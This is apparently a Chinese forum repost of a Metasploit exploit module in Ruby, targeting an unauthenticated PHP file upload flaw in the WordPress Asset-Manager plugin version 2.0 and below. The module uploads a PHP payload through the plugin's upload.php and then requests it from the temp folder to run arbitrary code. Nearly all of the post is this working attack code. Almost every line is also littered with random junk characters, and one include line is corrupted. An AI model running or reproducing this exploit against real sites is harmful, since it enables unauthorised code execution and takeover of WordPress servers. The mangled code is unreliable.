这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
% L3 K! e$ {% Y! x- C5 y' t- G& m) V# x7 l- s
##. M0 h: L$ e/ P$ J$ D( F# M% F
# This file is part of the Metasploit Framework and may be subject to" D/ a0 ^+ H. W, U
# redistribution and commercial restrictions. Please see the Metasploit
0 X' e( t( ]$ W( |/ D" ^4 K# Framework web site for more information on licensing and terms of use.
; ^; p9 ?# s1 f3 a# http://metasploit.com/framework/
& y) W( E" N Y+ v##
, l9 R1 T6 n. v
/ R7 \/ g! |- }& F% jrequire 'msf/core'
, `1 L9 @2 Q" g- Z) M" _# Lrequire 'msf/core/exploit/php_exe'7 }9 N/ s0 m! v3 H6 B
" v, N! {; z: X
class Metasploit3 < Msf::Exploit::Remote
: h/ U: z4 O" ~2 ~9 v: N* \+ \ Rank = ExcellentRanking- \9 `9 D2 i. j k* j% ]
. ?/ K# K$ f* |% \7 N include Msf::Exploit::Remote::HttpClient0 H- }5 S8 r5 p/ o
include Msf::Exploit: hpEXE
% d) k2 O& K% q) m + d0 M! H2 S8 I) y1 }8 _( v7 ?
def initialize(info = {})9 m4 W8 j, E, F+ j4 M
super(update_info(info,
6 z9 A1 q1 i# M/ d- g6 f 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
3 ^0 @/ }; I1 X- _1 G6 I# X* X 'Description' => %q{& K J: V2 h* I
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
N6 J6 z; I/ M |& y. @! ^3 r plugin. By abusing the upload.php file, a malicious user can upload a file to a$ ^% E% k) T8 G g0 f
temp directory without authentication, which results in arbitrary code execution.% o* V7 H9 P* K+ c7 m5 M
},
) o5 V8 g4 R& L9 J5 Q* a- Y" }7 ~ 'Author' =>
- b; ]5 O) w9 S5 R: M( r- { [/ U& X8 j4 h. o5 U2 I. O7 `
'Sammy FORGIT', # initial discovery
6 R1 G, u R, I% y0 s C$ y 'James Fitts <fitts.james[at]gmail.com>' # metasploit module8 F5 p: x+ t, i! R) m! `: A
],7 F5 x- Q/ ]% W, H' {) n
'License' => MSF_LICENSE,
: o" C" S0 J! }1 k$ X5 z8 k/ p 'References' =>
! V4 }+ _2 F0 Y [
0 v* h' C0 G4 Y' c [ 'OSVDB', '82653' ],
0 Q/ r& e# X2 P$ b7 y [ 'BID', '53809' ],( b) n3 |+ C# K9 [
[ 'EDB', '18993' ],
, d! M+ p5 h" _; f6 `* v [ 'URL', 'http:// www.myhack58.com /' ]/ f6 [: z R- w' O
],5 g; v5 P, X& C6 J/ }% [9 M
'Payload' =>
6 N1 P; U' |; }9 w9 b+ Z {3 t7 H& p$ C, v6 V% q" f2 \& [
'BadChars' => "\x00",
2 I) f0 V; k6 Y% s0 x# u) P },
/ L- P5 G: N4 S0 d6 h' A0 p 'Platform' => 'php',# e; [+ P5 `3 W. z ~; \
'Arch' => ARCH_PHP,( {$ \4 S, r% u" ~
'Targets' =>! V# r" x/ A) K& ~, b9 o$ u, U2 A
[
" T. Q1 E4 S) [& C' w+ h [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
4 W- o. k! p/ f [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]% u, X. i. C$ [2 r
], Y% p0 f" i3 F2 o! {6 R1 L7 u9 A
'DefaultTarget' => 0,) G1 @' y% x) r: K, P: }+ S5 n+ K, G
'DisclosureDate' => 'May 26 2012'))% x9 d# T' j6 Q( g
6 O6 a: d& l! S1 i; l, i register_options(3 w6 B8 l% l- B
[
9 Q8 U2 f2 r# r" M$ h2 U" A, _0 k/ E OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
, _0 p: e O, x ], self.class)% P) ] B5 K* {3 ~( R5 A
end
% |: }' \1 H: k$ n5 L
: t; V5 G) E; x9 v- Y2 Y! F. ^ def exploit
" F3 Y1 T! |! B& B E uri = target_uri.path# S: o& j/ J5 p
uri << '/' if uri[-1,1] != '/': k+ i$ n7 X) ?. E5 G( Y; [6 K
peer = "#{rhost}:#{rport}"6 p, N* ]' N4 c- `
payload_name = "#{rand_text_alpha(5)}.php"
. Q- d; P4 b# U# g php_payload = get_write_exec_payload(:unlink_self=>true)
! x0 q+ ?- T- n& g : e( b* H5 P w* Q$ E9 w
data = Rex::MIME::Message.new2 P! u* G6 q$ n3 Y' m: o2 p
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")0 \' p0 L h6 U# `9 q4 R$ Y
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+ q6 r; n w1 o: e; Y: r% ~
8 u+ l/ d+ T3 t* V3 s5 V4 o print_status("#{peer} - Uploading payload #{payload_name}")0 e7 D D9 Z. `5 n( W2 K" ?
res = send_request_cgi({
0 g% T. l S0 ]5 Q p; A 'method' => 'POST',' ]7 J4 p* q/ o$ I
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",' K/ t( v0 t& C2 D0 \% b& }; C
'ctype' => "multipart/form-data; boundary=#{data.bound}",4 x8 u3 g4 U1 s6 J& p n
'data' => post_data) ?& g! T: N+ _* _* r9 l4 R
})
! O9 o& b) j! A( O 0 L8 Q! E! y' C ^) f/ b
if not res or res.code != 200 or res.body !~ /#{payload_name}/
" Y' Q! {& R( X9 B5 g fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")5 D& A9 x$ }) i# `: _) n* b* a3 A
end& q" e% Y2 B! v. j
! k! h& L4 D0 I2 j' I
print_status("#{peer} - Executing payload #{payload_name}")
( v1 _( o& S7 H( H" v9 { res = send_request_raw({3 C0 ^0 s; e2 n/ S* ^# [
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
4 o! W4 d4 Q0 m, l& p 'method' => 'GET'
* v3 ~$ S$ x' }$ t v3 J })
8 C% v0 w- j3 ^ S I- n" n3 \ Q5 a2 W% U0 r- j6 i
if res and res.code != 200: E* X8 |4 U( S% D. `
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
) \) n% C# t9 G8 I% J end
$ _" z9 I' y. a8 K end, o4 }4 m L. T* F3 o7 T" Y0 M @
end2 [3 T: E! f9 L$ P n7 `5 w. f* E
|